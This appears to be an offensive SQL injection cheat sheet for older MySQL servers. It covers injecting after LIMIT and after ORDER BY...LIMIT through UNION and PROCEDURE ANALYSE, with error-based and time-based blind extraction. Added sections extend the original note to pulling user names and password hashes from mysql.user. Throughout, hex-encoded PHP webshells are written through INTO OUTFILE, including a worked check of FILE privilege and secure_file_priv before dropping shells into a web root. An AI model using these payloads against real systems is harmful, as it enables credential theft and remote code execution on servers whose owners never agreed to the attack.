1) Without ORDER BY
A UNION SELECT can be appended after LIMIT, for example:

mysql> SELECT 1 from mysql.user limit 0,1 union select 234;
+-----+
| 1   |
+-----+
|   1 |
| 234 |
+-----+
2 rows in set (0.00 sec)

GETSHELL (the hex literal decodes to <?php eval($_POST['z']);?>; INTO OUTFILE writes fields unquoted by default, so the file is valid PHP):

mysql> SELECT 1 from mysql.user limit 0,1 union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e from mysql.user into outfile '/tmp/z.php';
Query OK, 2 rows affected (0.00 sec)

2) With ORDER BY
A UNION cannot follow ORDER BY, as shown below:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 union select 234;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

We can instead use PROCEDURE ANALYSE, which examines a SELECT's result set and suggests an optimal column type for each column of the table. Its arguments are evaluated by the server, which is what makes it usable as an injection vector after ORDER BY ... LIMIT. Note that PROCEDURE ANALYSE is deprecated as of MySQL 5.7.18 and removed in 8.0, so this only works against older servers (the examples below are from 5.1).

If the application returns database errors (error-based):

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 
ERROR 1105 (HY000): XPATH syntax error: ':5.1.73-log'

If errors are not returned, use time-based:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(50000000,SHA1(1)),1))))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'

Note that sleep() cannot be used here; only benchmark() works. Also, when errors are visible the message already gives away the branch (BENCHMARK returns 0, so ':0' means the condition was true and ':1' that it was false); the delay only matters when the error text is suppressed.
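The note only leaks version(), but the same vector reads any value the account can SELECT. The following is an added example (not from the original note) that generalises the error-based and blind forms above: it assumes the injection lands right after "ORDER BY 1 LIMIT 0,1" in a query against mysql.user, that the account can read mysql.user (as in the note's own examples), and a MySQL 5.x server; the password column exists up to 5.6 (5.7 renames it authentication_string), and PROCEDURE ANALYSE is gone in 8.0.

```sql
-- Added example, not from the original note: using the PROCEDURE ANALYSE
-- vector after ORDER BY ... LIMIT to read arbitrary data instead of version().
-- Assumptions: injection point right after "ORDER BY 1 LIMIT 0,1", read access
-- to mysql.user, MySQL 5.x (password column; PROCEDURE ANALYSE removed in 8.0).

-- 1) Error-based, arbitrary row: the XPATH error echoes the bad XPath string,
--    so whatever follows the leading ':' is leaked. MySQL truncates that
--    message to 32 characters, hence a 31-character chunk after the colon.
SELECT 1 FROM mysql.user ORDER BY 1 LIMIT 0,1
  PROCEDURE ANALYSE(
    EXTRACTVALUE(RAND(), CONCAT(0x3a,
      (SELECT SUBSTRING(CONCAT(user, 0x3a, password), 1, 31)
         FROM mysql.user LIMIT 0,1))),
    1);

-- 2) Next 31 characters of the same row; keep stepping the offset (32, 63, ...)
--    until the chunk comes back shorter than 31 characters.
SELECT 1 FROM mysql.user ORDER BY 1 LIMIT 0,1
  PROCEDURE ANALYSE(
    EXTRACTVALUE(RAND(), CONCAT(0x3a,
      (SELECT SUBSTRING(CONCAT(user, 0x3a, password), 32, 31)
         FROM mysql.user LIMIT 0,1))),
    1);

-- 3) Blind, one byte at a time, for when the error text is not returned:
--    IF picks BENCHMARK (slow, returns 0) when the guess holds and 1 otherwise,
--    so the answer is read from the response time (or from ':0' vs ':1' if
--    the error does come back). Here: is the first byte of the first user's
--    password hash a '*' (0x2A), i.e. a 4.1-style hash?
SELECT 1 FROM mysql.user ORDER BY 1 LIMIT 0,1
  PROCEDURE ANALYSE(
    (SELECT EXTRACTVALUE(RAND(), CONCAT(0x3a,
      IF((SELECT ASCII(SUBSTRING(password, 1, 1)) FROM mysql.user LIMIT 0,1) = 42,
         BENCHMARK(50000000, SHA1(1)),
         1)))),
    1);
```

The chunked form in 1) and 2) is usually preferable to the blind form: one request per 31 characters instead of several per byte, and the subquery's own LIMIT m,1 selects which row of the target table to read.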

GETSHELL (with no UNION available, the payload goes in as the row terminator; the hex after LINES TERMINATED BY decodes to <?php assert($_POST[pv]);?>, so the file contains the "1" row followed directly by the PHP):

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 into outfile '/tmp/2.php' LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E;
Query OK, 1 row affected (0.00 sec)
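Both GETSHELL queries depend on server-side conditions the note does not check. The following is an added example (not from the original note) that runs those checks and then shows the two write variants side by side; the web root /var/www/html, and the assumption that the mysqld OS user can write there and PHP serves it, are assumptions, not facts from the note.

```sql
-- Added example, not from the original note: prerequisites for the INTO OUTFILE
-- webshell, then the two write variants from the note. Assumed (not from the
-- note): web root /var/www/html, writable by the mysqld OS user, served by PHP.

-- 1) Prerequisites. The account needs the FILE privilege, and secure_file_priv
--    must be empty (write anywhere) or name a directory the web server serves;
--    NULL disables INTO OUTFILE and LOAD_FILE entirely.
SHOW GRANTS FOR CURRENT_USER();
SHOW VARIABLES LIKE 'secure_file_priv';

-- 2) No ORDER BY: UNION supplies the payload as an extra row. UNION removes
--    duplicate rows, so the payload row is written once even though the second
--    SELECT yields one row per user. Default FIELDS ENCLOSED BY is empty, so
--    the file is "1", a newline, then <?php eval($_POST['z']);?> unquoted.
--    INTO OUTFILE refuses to overwrite: the target path must not exist yet.
SELECT 1 FROM mysql.user LIMIT 0,1
  UNION SELECT 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e FROM mysql.user
  INTO OUTFILE '/var/www/html/z.php';

-- 3) ORDER BY present: UNION is rejected, so the payload becomes the line
--    terminator. The file is the single "1" row immediately followed by
--    <?php assert($_POST[pv]);?> with no trailing newline.
SELECT 1 FROM mysql.user ORDER BY 1 LIMIT 0,1
  INTO OUTFILE '/var/www/html/pv.php'
  LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E;

-- 4) Confirm the write from inside the database before touching the web server.
--    LOAD_FILE is gated by the same FILE privilege and secure_file_priv, and
--    returns NULL if the file is missing or unreadable by mysqld.
SELECT LOAD_FILE('/var/www/html/z.php');
SELECT LOAD_FILE('/var/www/html/pv.php');
```

The leading "1" in both files is harmless to PHP because it sits outside the <?php ... ?> tags and is simply echoed; what matters is that the file lands in a directory PHP executes from, which /tmp in the note's own examples is not.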